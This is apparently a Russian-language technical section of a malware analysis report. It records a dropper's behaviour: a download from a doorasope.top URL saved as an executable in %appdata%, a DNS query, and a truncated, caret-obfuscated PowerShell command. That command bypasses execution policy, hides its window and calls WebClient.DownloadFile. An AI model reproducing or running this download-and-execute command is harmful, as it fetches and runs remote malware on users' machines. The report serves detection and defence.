Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^w^e^RS^HE^LL.EXe -ex^ecution^PO^L^ICY ^by^PaSS^ -^NoPrO^fi^LE -wi^ND^OWS^TyLE h^ID^De^N ^(^N^Ew-oBJE^c^t syste^m^.^neT.W^e^B^C^lIENt).^DoWn^L^O^A^dFilE^('http://www.doorasop...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "p^o^w^e^RS^HE^LL.EXe -ex^ecution^PO^L^ICY ^by^PaSS^ -^NoPrO^fi^LE -wi^ND^OWS^TyLE h^ID^De^N ^(^N^Ew-oBJE^c^t syste^m^.^neT.W^e^B^C^lIENt).^DoWn^L^O^A^dFilE^('http://www.doorasop...' (со скрытым окном)